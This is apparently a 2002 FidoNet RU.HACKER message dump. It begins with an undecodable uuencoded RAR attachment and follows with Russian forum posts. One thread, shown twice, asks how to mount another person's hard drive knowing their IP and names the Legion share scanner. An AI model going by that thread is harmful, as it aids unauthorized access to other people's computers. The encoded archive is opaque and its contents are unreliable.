M9&Z)6_^D''`GI^P,#\?UR0R35F73^>@9IX50[BX!'RC0"I3++Y[6P<[T2_LX?-<7`9?:E@:A3:5 M9H;]S)`G4F__R1("J``#.#*2L_\J"F($G0J*N4"5%14?%2Q-@`@B3F?`S-8$*"C(B@"@(`$N"=(`@Z0%T2P]^.."X MXB@O83I>_M_PN(T>%R\MZU??/"D<3+Z?TV7\C1O60\VH=CBR%.N,P#?HZE7H M/74W_7D+R$"D]O*0.CIS,3I;-ZWF;D=G/?9+>=C9^9FY-CX0'A/1(.TZ5K(; M1815ZZA!#H/C%&6.OZ^1VX[>5XD0EJNXB$CL@]AW0ADL/_IVT/-?91`.NU/4 M@/=NK$9^HTQ'*F]R/D4U+=,!A0*^^,N;[X@YUS.,D#W$H:B9YW^A6:30TG40 MN/?MKKR/Y"*K2DAK,.:#B:QSXC!BYI6\#O"B#-4^2U$84+TU4"U`'X_N+HB/ M?$B^PHG9S:M2"H9:3S;1WJ-KR1K\0XMQ?-TYOII(T.3L3$'+"_SJ,\J";!!Y M54!#[^BO[51B.&CJO<&?N4F0XC5?3$AUJ&A%3.N`C;&5_`P_)"PX[:>'9:1D M6@OBISEBVH1YL'A800UB@E96+D3!"7L0RFR`NL^K(N2QK&W:B_9K&9H_D(Z8 M1?&(TIZ\'@UF463JMILCXQWK5U*3BC?2:06)E\*7F#@6A:Y#B%_/+W#Q;#4$ ML@_8QJ^6CUB+9UK(1*<*2[I5&K&Y:+9HYW`U-GHRJ_$U"H=KB;WDO]:<>R9- MI1!$@/![W?^03C17VL&&;&TC=98/"&KH=IA?*$:0,I8Z`E#5?DQ\UI<,>RCM M'RKS026H(E2#;5P_ACF#+4V[TE#"4=@_%/4=37PTD?F(Y>A(IV.R_..=^%?. M@M6POK$)2`Z]PLO!JGN($YT;I0\Y-`!N[::\Q!'!=A4ME>G0TO&A5.>/7I3^ M"M@CB.+G>4-5`+W+L#'#F-WB74Q$`_OW%.21?8UEJ_FL*Q;UO*'&P'3*2+9AEXK M>7VD46%D^TIH4.+R.7W3)WC:_EK(HJFBZ MY`]T^NAK;1)EY&NRLV>`9<$$E\:OU5"DO>+W/#'9Y=Q#'@V[&?UCM,+:GA1@ M6]PI@KJ#(P-Z)>U'^U.;U7YFVCNKTW[O]V-UYGJN$%>T!ZZ$31(6U^>.T]\9 MJVF90A^82TL"\G]*?\E2;0I]&1H95$Q>-'12!E6IU!UWQ`*6J@'OIC'UW9EZ ML^PPAZ#R5+_M[$_Q-N'VQBKDG8>1C\K&JQX\A8IJ3TB(V210O;BJ.ZB6$?.+ MAK[:[M(;DU$7):MAY3721G1-V<$)T9^XT8A;XH7OAX6%/S3;9]>JFM-@5_01 M;ZP(P`JC9-&!%K%9!BXV/J!U/>=`8=I,!,XJ!N"O*Z&@=3=V:D50`?'1H@9Q M2Q2!NEUU4"R>Q@F=Z&/%B``S;M31F8+DUKE%V]RB-@F*YQLSN4HBBFTK%\*- MT8J8UHFX5LLT(=P7]^+FZ)(J6[XTCCW4B5<2*YTI]GY0XWVZG9[6_I(>[-T& M^?T$;NR'S*DA_5>OR9EF(Y@1%@IW$E/Y]5[%T`OA93UYH5S`/4+UM=2[GC?A M7;WJ6W&:,EOY?3\2[X`YWR/;ZO.5A84B]PN8UTU!XL!Z143MUDQ9JU^Y<4SO'I;W1WEE=3&S\C._ M=UW,]%*61R^K29EE>L;4$))*#I`!/X?O<-A).[%EPS.3>0S13[V^4`"0_^GO M*1MTX2,/&M9*QN&!N9FZ;F*=*D/0[A1^BMDG^ M>-EZ/04EL.AC9W0YW0[.\;$B7%+(X.D;?:K;--?]EH3Z&X;Z#O7Z[O-O7[@[ MY)/=,?)S1DFYF;HI^/3L+Y#7;X?>4'EHCP`ESNG!CD2,NWZX.Z<]K3#3%!*O M;!TOPDV$$FS.@BLNKX\"OQ'+A2-S_$ MA>I["1BJ'JOY+;<;YTA:E"5M9R!7I$B&39';5NHN&_RR=>%_4A8L[P43>5G) M!R>=,S,S*DFW\1L!)8`Q?!276_>B\7T.CF=JS\2!`!.UZ`1B;K'<"*K,(KEE]MSY6M8]#S.!:_X5UC#O>!!(9'^FAXT?\0`Q\7/K^ M)\0Y6QOQUGP?1Q%XYD6SLZ@3O0R@AI)(]MG0;5OB?6&K9-U:$1W_E0C:W`2Z M1LM:AC)(!2H@A,T]6))R`&>FLDP";<(**?75V;FB+1M_O4VX)>$4/=D>K][9 M1L_[2-)P2-ZH#EX,H8PTML)W(JGNP`&+D0RII/0MS7FY,S(D';Y18(;P\#FW M\@*7)7P)0RO?+PVW_[/5S,G.?[0]QKBR0PKB1;#_Z5;W?#H8$7[W\\91%[KD M#NMR!N/76QL2C^Q[O",6,",*&*R@F84S%<)R,"15`N0-VW_?8M$T+U:'-R!. M98E&.CHA5-S-'-/P.W(V)D9'"U=23_C+Z06SVAT8Y33C]&3!V"9U9D M.M\W6\O0Z\LP=0_Z6?2F_`(]]RR02>J(YR'_KZ_YF%B1[W"P^:VMS6HZ6:OQ M-\CU[F9HWG8!Y13/.X7J95'TLSLQGL.J;. MR5!LE%\5FZ*]%A\Y?V!?F6$8_2^]^;>O[Z5;QS=4X3X_:]B[M MO-[]OC2O-R![9T,[SF\Q,3`]K!K,CR;(S]=N/T=%_Y;>YY%U'YF#BM3KJXV7 MU,C'\[Y&AO++_=CFH=+VDJ[N^1;7$JXX3JNIC976QO-2O==6RNXCG9FAF])K M'7H*3L;?^AGN^.%;/)$Y>W#V?+^\+HHPNS"]':X9F9^3TW>P;TZ4%%OZE4!Q M[?D?H/59@TX,QU'>;C:&56IR\_?#,[#KAN.,([61PKM,%V6)T.%V*ZX3Z\GK M5?YW6QM$33C=&0]QY,KA.K6\C7KE7%M<7/"?/#O4S.K72?K[]3D/6UWQ%<7'YO0-:UT\;M1["LO[^KFVXRO'MD1SK1?><:9U+.PVPITH_5Q\JSP+Q+ M!XGUC8+Q[;CRKKS;;_L"TW1JC>O@0:_6S/0V$QW2=,?WXE[PG2<>/*X>Q#_\ M%AG(N.1'MN-<F,][CWL?BOJ9OA,-EZA$]^APW_VRV)[S7/>;^, M.+WH,.74%1_Y5L-EHL>>7"_?4$+9[D7?&_)Q9+T,KA;3TK'ZB^Q90].:,\8MJD5`1 MKMU@QG)+6VK\E^5I05*2[\ M`FI.L%ELXS#SY7>L5"58,=T6C4R&Q7Z7AWNX?.F<&I!:51GTC]J,0V.KH=V< M+EC(PMYDX>+?\K-A!-N&$RP8'ZU96@LT22RG44M*9-@`5X/ MWAKS27:J3&$013-:I&)?D2`FY)_CU2%*,GSC>5Y?SXV^J)$7#B0F@-Z)#*SM7PV:F>9H(34_'F`6 MK9@:T`WHL9Q&OM%N/_4?C&=N\HR$;H8N7.VVWAIS#$QINZH1?\Q9`7=2LJ/! MM%X(ZG:1Q*'YGW7WZ*U)AF3HA*KYRG(^5NQHKV!_8ER(0=(VC:\C;C,2)A73 M5+%5>E]J6H"2(:FS"^M>U24O6X/2D9ES]3MG4")B<9FZCU$Z\+W2,N]B*QJ. MZCKA"^_-5YWD];4C@MX_8K-XF)#,HYJHXRC"%QO2M:%U3KM+OH+-@8^#JW4BWBKHV1($G">UF`J46D9)R>])M MYC@<'O/YJ?US]LMG5"`;OC$I"=!D9O]X/_6&[LQCAJ8;HKJ1[L.,0FR7M$8._S$D;0C6A0PP>J*XCTRM$;7`Z4`=66,V8^59&< M'38AO&".P1S$@U,IJ2TL44DI6#`3F\/;XAN)*Y?(5]4SS*8L945N=K?*IMKB M#L\HB=!,'GP7F"06+PXN63GZ,F$)H\G?CHR<;0S^K)*[^9Y^:!A MHJY*J$S.F]$6QYZ"'^B%VQ>SIW+DR87GH8LW0Z+=7&QYG9LOT9GFDE(L9%OF M[N$A!%\@>!N%UZ_H]^0%^]_F/']3]_HZA)%:K_$A M[&RD(1696,[!5.2B098DF9RH8GXW9ZH^`-H6%4_PWKS]$O3>+*/$^#D+Y361 MP_I6AC]&)B)I0R7R=)MFCJ.G)09Q0A$"C756>[9_2\`8Q;J.G%I>2>;\8C%` MD9T\0F9G\J]'(GWE47/F M0-NFE+NH9`Q6E<,.7YK(9V_] MH5F_G3`H3,T)>(`:293TI@(9!6+-_V^+Y?D^G_5IB6_D#=;';G'0?--$A5(I M^:--W0`J$@S@I_@X%036NCR]VL MGWN:]:>]D90VFPX<99S11,V8F9(O-7*(2`5Q3!@@P8Y$^!=3=##RU MVZ,PLB5?>V9>2("\PPE#,?S_BB>\&[%\C(.C_B>]B?[A_[%O^9+']\ MJ_O?;Z'-"W*/` MWT:<&'!7Q8@2!(2/O/9(WH:J;+$1`^B(=4AU-"`#-*7HD? M!TA[6W%]56_&'Y8#S!D5^W9.QQF\&!GTV#4!OQK!KXKB,GA#)_Q@"A\2K(T0 M2FHW`$6L9K$V<+0'0#+!$[<],IK=!-NH(D(@MB93(BE##2TNZPL-LZ#&DJAS MZL*.;2;QG\[1@AZ*T:#//2^&178LQ#+=GMQ,]K\O/9_I%%%^G44#IZ=_U"BC M_(GJB>0%_N&42GHI;V!!]%#5)HGAR1MBAWT#F1GC^I0C['&>>)Y?$!.M\WBZ MYC\ZV#W"R^:)&J=*S+HMI@TE=B?Q`/15F9S$.!T4,3#ZZ\"[@JBF8CY:J-1W MY[V^P&\\H-5&*N9VN)Z)W#)E$*BTM0TYGNF#T-/XPGYX1S&MIS]&`W+%FXS* M:O11SZJ2)Y@'B00.3$;WCI[+HAVJ=NDZ7XH.MR1?+#SDOB\X-(?9(H')KB)[ MI3WR.1Z$:ARR)R3C1$2G:#!LZ#,;%2SKM[#TN!R,-)]2PE/TP@7SX8^>H^UQ$VQ MJ/&$CUG%AA"+*-^,*-M#\E&A#WRE!^;VZ*"A4,;+CHN%#Y5S4[,S]`\VHWP& MZAWE'>2"9)]IZ8UG59-X(O;ZD1VCTS2$P1*7GMI,Y0!77JUHD%*5KV*B>0'N M@[Z"/<Y0J#2P?"-1%AJ"FIL>EXT]/9IZHEP"[BU6/[\,)U"BMT88 MQ/@T#E%T51/K+L\5*3+)COA1=%C[M^P`YI.@JYU143!?"DZ[:!!W3VJ1E/'W MVV=427&(^!:1\80U3K$5=3W+

(#EX8D8\-B`Q.`V^V(`(I+*@TB/FM61\6M07LA.+32*`55+XYY_K9W=H`0/ M1J)-O>(_$H-`\=9Z<(U0W6G.V=C6VGQZQ?UK')&HDQU(^YDJ4&[4=+D MYC8\)XC!M26OH_W>XGU[/-@=-8:ASV'^4-X`:8-`\,1@ZQI=N'P+-$6\LZ[` M&K4Y1DVI+>?>H)2YY4XD"BZJ(=0!-BM=."3N@CMTVGIS;)370N`CU5OK%7U[ M+RA-EN/)J2"%4JTAFR9J2%(Y&/MI%RY@I&6PAVY^-*N.3RYCINMX3KQ"$!N( MPUC/[4[42>LQG_8EHKIE^I'2VHNG;Q(1TU$[YW3MPT#(7I5=5WWQ+G&PS'D: MZ*:0"70I-JQAV`'2^#2V^H($1V:AT2C7WN4/MFN_V`4H,;,KBE1,O\ZTVBB" M.=-)$V.F9*X4G<;08 MQ#"" M?![2XT(\U]V?Z#Z<*.P'3R=J![$]S'$&"7:06\-E#3HYO/Y901&RT72+"P'Z M^N-!`JG+\G,.U9#K!_Y4?:ML?NDL\\BF=BSS1+=OW5/S0I8\*:VY#57+!I,& M,L`5"ZQQ/QILV`^QVAN8E4LF(`[5#*:4ANH<*AA#I9EL$`)4]O^51Y'8_&'* M65],Q.9^8*NIOH`OE!+!C,"_\NW'<2<,N"R'=A2#'+*4#293;"`*U3%F"4&D MN#:=JU)R`3Q0B"-=7ZK,[023QF0[-C3E8%_SZK/^'N#^K6,^`^*7UT>Q(@?) M3@A*81M)$$+-665S,05%7%O(ON6*D/J"0P^!D(,.HZL@IKW%%<3:\1BCBN"D MZ7"[O#!M3F!C%4=]TUPER@C./!V_D'9$>G4:GFW-L$T/L0[%HFR@I.\&+PV" M\1]Y)RVAE(A0LMJ$M]VN,!(=^@C?#]I%H3W?4P0PP:L]53@8%#[JKPIW)4\J M30&_SAW>U"G1/!6GO6J!SB0].(C55A*RGO1E!)$8LO0]]2OJ?P>_']]#SQ_@ ME+RIEC#BCVY5X!B$+R<"R4&P`"&$[U;D@+.0@( M^6K6BTRFFN;ED[=J";.41=;]+#:0XC`50YWS_SI%N5^!#/X6]5O6U7:_K[]- M3WU`Z4'`4[ZDGS-&*+MA/JW8(M$J`TUG"#_L,5%,A^D]/OG%#XO(4"2>D)2& MO$`YV?ZTT9352.>>BA_%6QG0$@RM$5ZR3U6I)V=O6XM@L#[:]'\6]UU4U#IR@HC(:%P8[ M@4._@+W-&'D,/$C:W89:CUS*E5A+0IKPSCT%D(\$IZ-K&:$*[L^0=_`[V[U_ M!P@O82LW`4[*$ZJ=OCW$F?D=4\4/`P7\EZ@S#'OR@`E_\";"0AGU1^(XC&.T MX?D"H5UCMQ0_?=\)\= MIHHX?\XU&NF=.7>PS8<@3TYB.E46JG(!MD!3B-EF#A8$;I)3>5$U?4*:,V=Y M.J&Q\_U6@7]4MBC8;?U(P84)G49F!BE4P(ZJSK$7>#>L]]>]NDA<^ZBF7'0% MUN.&\(4<90LY=P+D94`+P115?SF_*GN+3ZA37!O=N"L&,WM,"X@VCJIDM9?D M.O1Z6ZL]QZVZP(EY4*8O%6)9:DJ*4E2FJ.JF(*(NV$#P6"8L$TW/"9=(%51T M"M790]18:/9_Z3#:;?V,8.,D%0B.&=UB7"<4,\%('U4VBJU$R/Y:&\^`L-9Q M%UR.VYD.Q>3,$.7R3BA4;*$SMM(+J[B!"`3=GD*Q":@^^7\BI>JT?U=W^/_C MY>Z]SL2_PRQ_7YK-I<))A'B^969OI'$30F0%3H:T,=-K*@^W(AOS7T>-CT_@ M5O\9]V@4+["P:CPD!17C>RHD?[5,:6QF=2TA");BRB?E`HUY^JD0#SEF5],8 MTH>]H=EU2W);0V!T3ZG^PT#"HHC'^IQBKEHAC9(<[?![NM%W?2;8GI]2=0V= MNFLAH*]@[B72ZC&"@;Q/T=WX^[_'N]OY^[#]Q#AS$O7QLQ@HB+'WS4JLIT^" MN5E878OYN%S;B.?4:;':^;F'?4JRJ#;?L9@YW/@_5R19\I;C/JU%JV8$@5-R MR<$2;EB<_;VNVT=I[&3/A;X"&$;&)C[SY[3MEJ4Q"9H3OJ&Y\O$(+D\E,ZE+ M\F]=^/F(9@KDL0:K3;#/8;MGQHO":=48'<5 M$OG+"<0A;K=V4%BT=`B-8/DCO2K8"H]M>1F+:'416J$9C.DP_:!,O*G1);,E M*S/>IL`#=)(#JXR'=A8\*&$H+C<[K]JY)5LOEW+#J6`T].RC"2$>YTVH*QDT M(H.TAZ8_>36[5;;TPX!:0PLD\MW(O.JBVM%D#<&%@5_1$TA/KC:&GUJN[=BU M%U"'1`*>L$A0YX=W+.;6FCL_IKU&V6-6`D4RU-<$]NZDB`4GL&?4_;/!*B?1 M:ALU10?J/I6!20[B^ZH0N:>H=(M%X[35=3VV^Z<`N_L;O=KZ@IX:Z55BS>0' M3!#$L8RT]KU)NRBZY*["V25+Q'>0MG:=JB/KXRZ>.S")HD;,]%7RAS_FL%]L M>V:*`Y%_&+W8:>P8I6+`'"6AXZ1>34*ZF&>=Q'OC1$,=A?;R\=S1@*#:<62E M[T7I#384C+4^)VY&5&(EP&HVZ!ZN8F4`TNHLX!#2DXPCQ`JA[-R.IZIQV%#( MV=V3WB->IV:+NTX=_[5_?8&*BV0GN[+RO;O_>Z%[SL/?S!Q>@<@*3B++`K)< M-<4EU`R`QXF+$P MOJ?UW@?K6#Q8-A4G:]"HCF?>%>CH.VZINQ[L9WXFO!W^Z#;8*,[;%)\G\S0: M)W0.-3L3S_F'>6@G(M;RZ;8,C*0'%HK3T`C[327Q4'ET7(1Z%#9Z,:$EY?4Q M@E6,[#<2Q'^PS8SLCM!^W1*II%E\\8KEQE=>!$RP]M;QO?HN5` MGT$=[AM3W;_?Z7$HG"EG(=>*(^NM>-'MHL+W),ZK[55K0Z3I;"87`/GY55V: ML]`YS3J"MCQ+,`84/$&9@E`\>XOO"JFAS(QL@MG.W?]-6'V"!Z_%E7,CA5@B>GVD M;@4]TH;(6`T99=/G(JZ;&>:^$#)&.LT]8:[T9%AO&I%CR&%16#1;^+O=U0@J M:)#2)GA9%PTDFZ5=H&"DJ/%RQR`S%IIP9-XD$W_A2TYGZAZD M((\\4+Z!P[M!CK*?]D&V/7@$F6$=NKO_H[!H*,X!.E3>MF28;OUDA3+=;%P; M,(6Q+6-2F:"-!':Z2\+095XE;\HL94%`C=12_VL4)J`QIPK$"!28MD%7FPT^ M'9\G>8E[@8$=0SYVD"N\/R2D;@D\%*RPW_V^S'=*6EX(@GB_HZ1R7 MOA\T^<9Y#DPWR/T>I2\XC8#M,Y-[H9N_V7G^X)%5,S+?U1\3\(35>IY?M:*/ M$!6G3\'YI@0#MWHZ??JM:5G'#ODYMNG6S=Y2)\`"$#ST2>G._A]D26ZM18-S M>I6HR?\B\I$MA%B1[KG$PBW5'R@L?4LB3LT(J!4O2WB"Q*O:[/L+C,*V$-4. M@C?OV24+G@=TL&[XX246VN!1"C_W*&UMIE]KFRE-"?0CWV%&NT60MIB/H2I` MQ976T-QH%742S%Y*#@&,SP;<7ROKY`#SH4O!TFQ+Y91D0=L3F^]S\#!3&3RL M+"]N^YW,YJ?@+:-]\7!O\3$*^UH/M-#R[;*[8.>$6)*X/S*).Q&%3<")G`P? M0R\YI=[P\0NUDW9<4C437C=)OE$6@B0QXCG_7]W'VV@06Y M0H::1(U].W,FH@52*`Z44T#,KF"5]\H_$X.N4$.T%N6*?!K0@:\BH(M9SJ[.>;J#.IC0@.( M5XB%F8C+Q9HMR!`58:NP@@YTI7TY,S-]V/@^\Y2PM0>4([RHY:Q8W\^H@B8U M9&47<%FBP-DZ5A.G_7XAGX+OD+R&Z_J3OC6_Z2(4P[WGQ-(5,0\N;1W+R**^ M\)6PZN-&UP_=VYI=6[RL*_8M>.IG-TS"K1X855:T]@!FFC#<+)($BL-!N"S*)+A[TT@'I4(KFYB\YC-O:6RF M29X6''T9!S[M%K("4BL&C1.([A=_#;4)NT.YFMQ.0DUP@A%ZI@D-3O()"`FX M'P;J[JX2QY=UU%69/+ERHG!XJAM>,^**E6&8/5'4-&Z#*MPD\`"=_(NB:RJ= M.U9(G*L11_I3WA7=CFDM5F0ASO""A M:IQ%>#@C&*,&;#:+%V%PH03C:JI'R;"D?H>*QYXKH!U^S%3FVAP%1..SGE<: M2:E`"JYTU'8W#C:@<2,>V!X[)_@?>*I.M3A)P'R[):,!*BVH7'P%;A!RZ!]P M&T3YX.#BHWM"V5FY<,'FZJT9GK*LUPRTQ1Y&42\D?&+5HI-3;L)VR?IFIM7F MHH)LT:59D_<29C@V,C,(J5'37LT0PV1GFZ8VC09.X]K-;6UK%T+&MAC$5Y*Q M-4_C&_$\?DAXFUV7YU!INIM)L3-QW$_TOR(.%DQR%D6I[8F2.@8H30.Y5"J; MI^.>Z8.L.7"%/TG%,4A1'NH8:"'.K/AQE]W$WTQ>V@T)$)ZB\#171^HPW$%H MMVPWARHBJ*%J8?-!E`S_`5RVCB/OW\4@**`0'UD+-1^BWW9QVFV&J]G.=FUO M43B#42RW4FD-\YOA%D.P)DY$;M5)W)2F?MM,@L_(AFF[707C.?9U3QX#JWMN1(JPD2JMY%ON9,Q]TF4-&E$S1HR2]>%: MC/[M6<_QLX*8,R$K#\S"FEJ^YQYIUKDX3NDO9TE!,;)/$`H903V\W)SNKD`4 MA56'6W0:XMU\##O4T(D$;IER$JCBHP;IL=*4EX<[W_&Z`CD">]CD''$+R6]) M(88O>G$\I$Q!]TK914A=';'75D[^I!-&+^S#YV)B8%Y@O7F6%#?HO$%W9CDK*N#_CH9?6@%*)>;<^)WHOI_@/CIW!UV'D9V9E=C(Q_R.L/"7:5(N/PA_(8`$7T4%;&+30^Q5!$7S;5AAC8 M19,Q_$I:0^PVK2;8NNBQ;T[GT?BX*>%QUNF!X?^TG(<%R[WKEKC$5XN-=4$$ MJNU;HA%'\2I:YN>.[.QU`Z_J!@RQI>T\`RV]P_IFUS@_153`K]!UMT7PXP_GM[GC.F@^VUUGV?C+=5A*`BH$B52%-LC7W[ZF%WK;%+PC.16DP,; M9T32+NTBZ(T+)51VB2_O!>@%#?B&1RCEOI*'BDE8I:-*]M_XP4QNN1>L[Z9B M4DI+[=J;C"TA.SIK-$E(_MGZZ[6H.%.-6XCH\C%'7DL^O<&[N)]-27E$F*/B@Z,K(CEV/;.D2@ M>4MQJ(=&A?G4T-E3J#%L"`'%OAWE*\)`#S9_OW^0LQ0V2G))@93HB9:5(B<[ M1\(*K5O!LAWS7RS#?KZB]@M)SJ?-N%([WR6K\RO!)Q!V>>-5$R/9I,.`OF*< M$XCQ9HIC#L?1A`>!P>'9<'%#)4I=IG]U.8TTZ=P1"6*1(3T2R)G9RD?JU!/4 M@\9">IE]%-,)D*Y%=HEVN&:^V,4G<;'\Q^N?!]`R!WC*BP3ES76" M7\^\9D0TBX^^#(E_"N$8\3H$&*5\L6-BS?3@6:KR2J,))L7@;D M&-7*&,;`*#7LX%'L?)S2CF>F^)8&VR(^55FF"!V?M] M1DV6IDBCR?+GR0<6%"B#L;BXV*_@36R)"C@$4:P5O;\;D1Y5S?.SU^\I\RTI M[_`!7Y'>)"IKN[EX1_C\OQ?5\7\>[\:5D2I4>XMH]W=/<>7QKJ8\O2+]"V2S MJTFQAR&1ME9>:B=H[OS?);W7(C7=V/_7-NS,:')$,(Y?":EOE\Q?T^5JSZ0X M<(9;_G-]$H4ZLWTS=[_L]64.H:\P;[#O_>#B3//;7,>Q:&Z=+N)4 MQY?FD>8.JHW+U!'R0[]%T8=]V"C3M![_O!)I>SI7IF=AV`H&^ M(\ZJ1VP*R\CL@"F[>0!ESSNL?S,@6$DSY*56X\D_1WC<50[X9I"$IQAT;"<@ M`('KD3C>,P)C062.01KV7RKR]]O`P?:%R4_Y262M*(R,CM!B+E)BAVN8T-)! MM+VM_*Y$>\F9L<2Y::(#'_E5U,<94>=CA*Q9>G\_E^EG#]X!M5D-KL7$BV"- M[5GQXQNQW5K$0LQ*_),?7IZ_">%%_I07TO2,^ZQ5]"7R0]>.=&>["L,M[W\& M_Y_0YYQ:=`GB.T_#!;'P!'AW:?23B/4XC1_2](\#@\:KG.=YB/[^+HS,C]X_ MH45#0T(;%/968@>)"6R07Z=_HG_>^Y@&_O]/#R\;O.15!%);Z8 MER[G/PZRW3SL:X]WIXTJW=YS_Z_^;LN`&)-V@G&"MW-T2T\Y7JO8.AU^B@,V MN]3/[W02O-1(:)\YAT\T,4KP*\\W$91HL/]K]W]M5X(=B7=CB=IQ.5NCL/*Z MJ*Z82H(\58\F*HC$/GAFB9_/=?5,LA78^2*+6\BZRSN48DCB.^ZUKK\J.S9+ MX%<0MI7+=C,A+KU#D!=Z'0(<\ M+-#E&9A/E)%@CK$8'27-X\U@Y&?T=#.E2+:,W^BTC!(!MO?V!DJ86;D]/)&) M)FJE$-100*Z5A^[QH>T,$R7/B3=)1CN8ZC^X#*OV9.5,'V3SR2$0Y>#-AZQO MT0:1T'-MLA6`FAR*H2D4IHT#1$9RAP_F,+2V=RKE3=)SGZ"NQ&?`-C3(62Q8 M2?_%H\Z\"1PB[#H"(D`L`E3C4Y9C'"HY6>T$#UA>,]":GI7M`G"#*U6!MQ^# MD_"LM-"/?\T2FJK:$#Y<_7I."'0S1+&=V96:59@S.*Q!78F-S9H3JFJ*$6@V M*_?TJ<''+E#602(F"]RE$P=LKG):YP503.#N^O:!>\>1$XH;DO78J6CNJOA9 M.(^#O#%A\-JCT?N3-`KDE5N^5\_-!@M9J)P MHHS\\_;_A-*M:_A]VMW:^?U@O<*#/V+N/WMON2,;2\1&U7QVH,KI5E>A^,;@ MQ8)R+X'U9L/E>]"9ZPZAFCXG[*2K6`W#H(:UVE,7H7JDV'^WK)>KFP^5\L+N MEFTT']PV2I,61UM_:JGUG=.W/3'PB%X/(B[DB[W*O1^A96GF7;)`C=L.YA+4 M(3(G6K@QL!V>$YE*!W2/"*6[&F\TCD$,F\4@)'),VWO@/S_"\K]QU#*@QY8SY=J&*[#Z)+M?Z!IE\.TO MPG`\O`]K!WSO;_!Q;_#XJ=P3BYW!Q=&Z+_Y(TNNGC=+(JQO,T(%_%5IC\6WX MM8QS3G]GV0+#`[4$'>J[J>OV]TQ4(&I'RL._]FJ`7YLCM2!18=%D]?J5<8F' M>[ZLDM%PO1?'Q]"J+-T).7,ZL=WZNEU,GDY57G6]:`@>^EU<8%-U)_YY(15> MKF=B3D=?0R@:89[^7G6RT01/6N4_"NCHY5>WK509]MQZ\-;GV,+#OK_#,EHS M5-W0_URK_`]KE8H]4ME:Y*R%J'&%O9O5(=2%8?V;R]#7\Q;!N0,7V1V7L/,Z M^-E\5Z]PN7A#OO[.GTVJ1%9G13_\UJS%L"YKV-85ZF7ZRMDI[I5_L[.]:9FG M7X6EW%3LTM[_W^'ZKWLX6#BC;%\:9GO)8)ZJT\"(VEK'[;P?:ZN;D=-^M2J+ M([6=D9,C+QJ_>.:KCPH8-QC]F^0K"RLP?5/=7G6B_LN[JL7CVP19`\*=>L_( M*97@_]S?7__G33BKPCD];H9^9,LZ7<>ZKX7'G"J9NGY;*F7[?8PS3;E7,2F\ M#?BQ;Y9-1Y0ZZKG#YB?1WEBWQ_A/\KQKKQ;SV.7?K\L1ONVR?]8(O6(NQ[_H MA84UG>+>+Z5Q9#45>6GK4[E6_&N>1=+A(CUO^V(^<2=-0BO$,\\.,$C6N';& MG@0?"-E3RN!N#Q^9C`CNLR6]"K/$!;9^^7XU<7I?NS<;KC(?`1Y5ZK/])JL> M:D1MC6KF3@>N_69^3_2Y(*U,N_W@B7)SW3@7X"XBPR7'L[-Z7H\`R;D+J9/3XK\JFGK_MDXWK@(28=@!`7@`4 M-!00E_:H]SBKWCQ*X,LV+ I"H$0`^?RT`62U'()__U`,6E>_.;/2!A&,IVKTY(T\#[)4WH&]!I]SO$` ` end > -->8---------- End { HK_PO_IO.RAR } ---------- С уважением, Andrew. ... "... и это просто рубеж ..." --- Голый дед, который живет в Win32 * Origin: "Лед тронулся, господа присяжные !" (c) О. Бендер (2:6028/4.17) = Здесь обитают хакеры ====================================================New= Msg : 2418 [1-10330] From : Igor Pluhaev 11-Jan-02 03:19:32 2:5090/177.8 To : Roman Rogozin 2:5090/94.4 Subj : Сетевой диск =====================================================================RU.HACKER= Hey, Roman, SUP!? 10 Янв 02 00:26, _Roman Rogozin_ ══ /Andrew Smirnoff/: SV>>> Подскажите пожалста: как зная ip человека, можно подключить его SV>>> жесткий диск к своей машине. AS>> Пpога такая есть, Legion называется! RR> Эта прога называется Windows, легион обычно юзают когда ип неизвестен. RR> а в данном случае достаточно в гуевых менюшках виндов выбрать map RR> network drive и ввести путь до него. это понятно, а если рабочие группы разные (идентификаторы не совпадают) и соединение не LAN, а DIAL UP? %-\ #▌║▐║│▌║││║▐║│║# _/*Thats all,*/_ #7║391▌222║6754# _/*WBR cRAzY!*/_ ... np: Hаговицын - Потеpянный Рай --- GoldEd 3.0.1-asa9 SR3 & Windows XP v5.1 build 2600 _03:19_ * Origin: Марины СУПЕР! (2:5090/177.8) = Здесь обитают хакеры ====================================================New= Msg : 2419 [1-10330] From : Igor Pluhaev 11-Jan-02 03:19:32 2:5090/177.8 To : Roman Rogozin 2:5090/94.4 Subj : Сетевой диск =====================================================================RU.HACKER= Hey, Roman, SUP!? 10 Янв 02 00:26, _Roman Rogozin_ ══ /Andrew Smirnoff/: SV>>> Подскажите пожалста: как зная ip человека, можно подключить его SV>>> жесткий диск к своей машине. AS>> Пpога такая есть, Legion называется! RR> Эта прога называется Windows, легион обычно юзают когда ип неизвестен. RR> а в данном случае достаточно в гуевых менюшках виндов выбрать map RR> network drive и ввести путь до него. это понятно, а если рабочие группы разные (идентификаторы не совпадают) и соединение не LAN, а DIAL UP? %-\ #▌║▐║│▌║││║▐║│║# _/*Thats all,*/_ #7║391▌222║6754# _/*WBR cRAzY!*/_ ... np: Hаговицын - Потеpянный Рай --- GoldEd 3.0.1-asa9 SR3 & Windows XP v5.1 build 2600 _03:19_ * Origin: Марины СУПЕР! (2:5090/177.8) = Здесь обитают хакеры ====================================================New= Msg : 2420 [1-10330] From : Alexei Kozlov 03-Apr-02 10:21:34 2:5025/17 To : All Subj : Remove Cancel Button in Win9x =====================================================================RU.HACKER= Сабж пробегал недавно вроде, но архивов не осталось :-( Если кому не трудно - киньте мылом что там где поменять надо, чтобы сабжевая кнопка на диалоге логина задизаблилась. Заранее спасибо. --- Microsoft Outlook Express 5.50.4522.1200 * Origin: RELEX Inc. (2:5025/17@fidonet) = Здесь обитают хакеры ====================================================New= Msg : 2421 [1-10330] From : Oleg Agapitov 03-Apr-02 15:15:31 2:5011/119.126 To : Ilya V. Vasilyev 2:5020/287 Subj : FAQ [Чaсть 2] =====================================================================RU.HACKER= Ответ на письмо, полученное 18 Mar 02 г. от Ilya V. Vasilyev: По-моему Вы, Илья, просто перечитали журнала ксЭкеп или живёте, пользуясь исключительно RFC-шными определениями --- 38 25 10 18 29 8 5 20 20 20 48 35 43 17 19 45 20 20 20 * Origin: bizon (2:5011/119.126) = Здесь обитают хакеры ====================================================New= Msg : 2422 [1-10330] From : Maxim Lanovoy 03-Apr-02 15:43:28 2:463/1124.6 To : Ilya Zabegaev 2:5049/124 Subj : СЕHСАЦИЯ! Смерть RSA! =====================================================================RU.HACKER= AK>> С первым апреля Вас ;) AK>> (хотя первым ощущением была паника ;) IZ> :) паника... хех, а если прочитать в багтраке securityfocus'a, то там IZ> описано, что взлом ключей возможен. Правда это пока только теория, но IZ> один фиг теперь нужно генерить и пользоваться ключами как минимум 1024 IZ> бита Все зависит от того, какова цена информация, и 